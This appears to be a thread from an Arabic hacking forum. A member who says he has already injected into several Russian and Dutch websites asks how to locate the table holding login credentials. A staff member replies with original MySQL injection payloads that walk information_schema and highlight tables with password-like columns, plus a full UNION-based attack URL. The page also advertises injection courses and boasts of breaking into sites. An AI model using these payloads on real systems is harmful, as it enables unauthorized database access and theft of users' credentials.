1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

مساعدة في معرفة جداول ال Admins

الموضوع في '[ غـــرفه الحــقن ]' بواسطة Mr Bl4Ck H4cK3r, بتاريخ ‏21 مارس 2013.

كاتب الموضوع : Mr Bl4Ck H4cK3r المشاهدات : 1,422 الردود : 1 ‏21 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Mr Bl4Ck H4cK3r
    rankrank
    Developer

    عضو منذ:
    ‏11 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    عندي بعض المواقع المصابة بها أكثر من قاعدة و القاعدة بها أكثر من 100 جدول ولا أعرف إين الجدول الخاص ببيانات الدخول وخصوصاً إن المواقع دي مش بالغة الإنجلزية (روسية وهولندية، إلخ..) إذا فيه طريقة لمعرفة الجدول الخاص بمعلومات الدخول أو أداة تبحث فيها ياريت تيفدونا، وجزاكم الله خيراً.
     


    أعجب بهذه المشاركة Ahmed El Melegy
    جاري تحميل الصفحة...
  2. أفضل إجابة:
    Post #2 by Ahmed El Melegy, ‏5 أغسطس 2017 (1 points)
  3. متصل الآن

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    215
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    أفضل إجابة

    نعم عزيزي يوجد مثل ذلك إليك مثال

    ملحوظة : هذا الإستعلام من كتابتي الشخصيه تسطيع تقول أنا صاحب التأليف الخاص به

    الإستعلامين المستخدمين في ذلك


    CASE statement

    كود:
    
    (select  (@x) from (select (@x:=0x00),(select (0) from  (information_schema.tables) where (0x00) in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select CASE WHEN ( (select  count(*) from information_schema.columns where table_name=@tbl and  column_name like 0x257061737325)>0) THEN  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d6
    26c75653e else 0x00 END)))))x)  

    IF() function


    كود:
    (select  (@x) from (select (@x:=0x00),(select (0) from  (information_schema.tables) where (0x00) in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select IF(( select count(*)  from information_schema.columns where table_name=@tbl and column_name  like 0x257061737325 >0),  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d6
    26c75653e, 0x00))))))x)
    

    مثال


    كود:
    testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,(select  (@x) from (select (@x:=0x00),(select (0) from  (information_schema.tables) where (0x00) in  (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select CASE WHEN ( (select  count(*) from information_schema.columns where table_name=@tbl and  column_name like 0x257061737325)>0) THEN  0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f723d626c75653e else 0x00 END)))))x) ,8,9,10,11-- -



    [​IMG]




    كما تري بالصورة توجد كلمة pass تٌشير إلى الجدول المٌحتوي معلومات الباسوردات فهذا هو الجدول الذي يحتوى معلومات الدخول

    بالتوفيق للجميع
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...